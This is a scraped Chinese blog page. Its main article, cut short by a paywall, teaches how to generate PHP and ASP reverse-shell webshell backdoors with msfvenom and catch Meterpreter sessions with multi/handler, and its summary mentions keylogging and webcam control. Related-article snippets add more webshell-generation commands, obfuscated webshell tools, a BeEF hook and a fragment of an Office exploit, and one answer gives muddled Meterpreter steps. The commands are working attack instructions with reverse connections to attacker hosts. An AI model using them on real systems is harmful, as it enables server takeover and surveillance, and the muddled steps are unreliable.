MSF建立webshell后门,并监听端口建立session连接

最新推荐文章于 2025-04-03 18:09:11 发布
最新推荐文章于 2025-04-03 18:09:11 发布
阅读量1.2w 收藏 32
点赞数 3
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u012991692/article/details/80784258
版权
本文详细介绍了如何使用Metasploit框架创建PHP和ASP反弹型后门,以及如何设置监听端口建立Meterpreter会话。通过keyscan_start监控目标键盘输入,迁移进程,获取用户权限,执行系统命令,下载和上传文件,甚至控制摄像头等高级操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

   建立反弹后门

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php

 

注:生成的反弹木马存放在当前用户home目录下;

将生成的木马上传到目标机中,可以远程访问;

windowsasp反弹木马:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

 

 

 

 

 

 

监听端口建立会话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windowsphp

最低0.47元/天 解锁文章
msf生成webshell攻击服务器
afei001
03-22 1062
实验环境 攻击机:kali   IP:192.168.3.157 靶机:win 10(已搭建WAMP) 生成Webshell攻击服务器 1.在kali上生成Webshell Payload root@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...
msf生成webshell_MSF之Web渗透
weixin_36212560的博客
01-13 924
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
MSF-从webshell到完全控制
scrawman的博客
01-18 1104
文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import
weevely混淆webshell联动msf
灰太的表格的博客
06-15 580
weevely混淆webshell的联合msf 生成 可以看到有两个参数,分别对应着进行混淆的两种方式。我们分别来试一下 整理一下代码稍后分析下混淆过程: 利用 将混淆后的webshell进行上传,进行连接,会传回一个交互式的shell 常用命令: :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd
【内网安全】——meterpreter使用攻略
最新发布
qq_41701460的博客
04-03 1364
原贴在这:https://blog.youkuaiyun.com/qq_63844103/article/details/128815533。
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 393
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
利用beef和msf实现session远程命令
居上
10-24 683
笔记beef启动 beef 的方法msf beef 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 的方法 1.beef-xss 2./usr/share/beef-xss/beef (使用前需要修改默认的用户名称和密码) Web 管理界面 http://127.0.0.1:3000/ui/panel Shellcode http://127.0.0.1:3000/hook.js 测试页面 http://127.0.0.1:3000/demos/butch
msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell
weixin_32139875的博客
01-16 536
两个代码分别贴上[Python] 纯文本查看 复制代码import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkin...
msf生成webshell_Metasploit之webshell提权
weixin_39584549的博客
12-22 707
本文所涉及的方法只能在已授权的机器上做测试。首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访...
114.网络安全渗透测试—[权限提升篇12]—[Windows 2003 ZendDLL劫持提权&msf本地提权&msf持久后门]
qwsn
07-07 2331
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 在php里面有一个扩展是zend。 IIS6.0 在启动的时候或进程重启的时候,当有用户访问php网页,则会加载我们伪造的ZendExtensionManager.dll文件,该伪造的文件通过hack工具可以实现反弹Shell功能。 已经获得了靶机的一个webshell,且zend.dll是可读可写的。 (2)靶机链接: URL:第一步:【获取webshell过程略】,以下是提权过程:第二步
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
黄乔国PHP
03-22 1万+
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
渗透测试基础——MSF键盘监听
g90900的博客
11-24 355
⑥用 use 0 选择漏洞载荷,用 set payload 设置攻击载荷 命令为:set payload windows/x64/meterpreter/reverse_tcp,设置受害者还攻击者 ip.命令为:set rhost ip 受害者 set lhost ip 攻击者。②打开 win7 和 kali,在 cmd 终端用 ipconfig win7 IP,再kali 中用ifconfig查看IP,IP 就是系统的身份证。开始键盘监听,命令为:keyscan_start。⑧开始攻击,命令为:run。
MSF:Web 后门
weixin_46104215的博客
11-21 2043
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
使用msfvenom生成木马用于监听别人的操作
热门推荐
Unitue_逆流
03-20 1万+
msfvenom Options: -p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n,
学习记录:通过MSF利用Web代码注入渗透服务器
qq_60709081的博客
06-07 1476
靶机: Windows 10 专业版 22H2攻击机:Kali网站软件:PhpStudy靶场:DVWA就不演示搭建过程了(主要是懒)。本次测试的网页如下:难度等级:Low主要是学习怎么用代码注入和MSF的结合去控制主机(当然用WebShell连接更简单)首先分析此页面使用的是命令拼接的方式来实现功能的,所以我在正常的Ping xxx 后面又加上了 “&” ,由此尝试可不可以执行别的命令,结果如上图。// 输入的语句点击Submit, 发现返回了Python的版本号!
msf使用方法
weixin_47679436的博客
05-16 448
msf使用
MSF怎么把木马上传到目标
nlj1860453的博客
01-29 912
想必Kali小白总是做好了木马却不知道怎么上传到目标机器上,今天我就给大家讲一下上传木马的2钟办法。第一种办法是网站上传,在kali依次输入下面代码把木马上传到网站。此时在目标浏览器输入kali的IP可以看到木马就在网站上,点击文件链接下载后就可以打开了。什么?怎么会有人不会查看IP?kali和Windows查看IP的方法:ifconfigipconfig。
webshell与反弹shell使用详解
有勇气的牛排博客
07-24 1914
1 介绍 在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限) 2 webshell 获取 2.1 php策略 PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。 (1)下面利用weevely生成一个php weevely generate 12
生成完马先让msf监听本地的4444端口
09-27
在Metasploit Framework (Msf) 中,要让Meterpreter(MSF的后渗透工具)监听本地的4444端口,首先你需要确保已经有一个Meterpreter会话,且它连接到了目标系统。接下来,你可以通过运行特定的Meterpreter命令来配置监听服务。以下是步骤: 1. **打开Meterpreter会话**: - 如果你已经有一个Meterpreter shell,可以直接跳到下一步;如果没有,通常需要从exploit、payload或者其他模块获取shell。 2. **启用监听模式**: - 在Meterpreter提示符下输入 `use auxiliary/server/meterpreter_reverse_tcp`,这将创建一个TCP服务器监听。 - 接下来,设置监听端口,例如:`set LHOST <your local IP>` 设置本地IP地址(通常是localhost或本机IP),然后 `set LPORT 4444` 设置监听端口号为4444。 3. **启动监听**: - 输入 `run` 来开始监听。 Meterpreter将会等待新的连接请求。 ```bash meterpreter > use auxiliary/server/meterpreter_reverse_tcp meterpreter > set LHOST <your local IP> meterpreter > set LPORT 4444 meterpreter > run ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值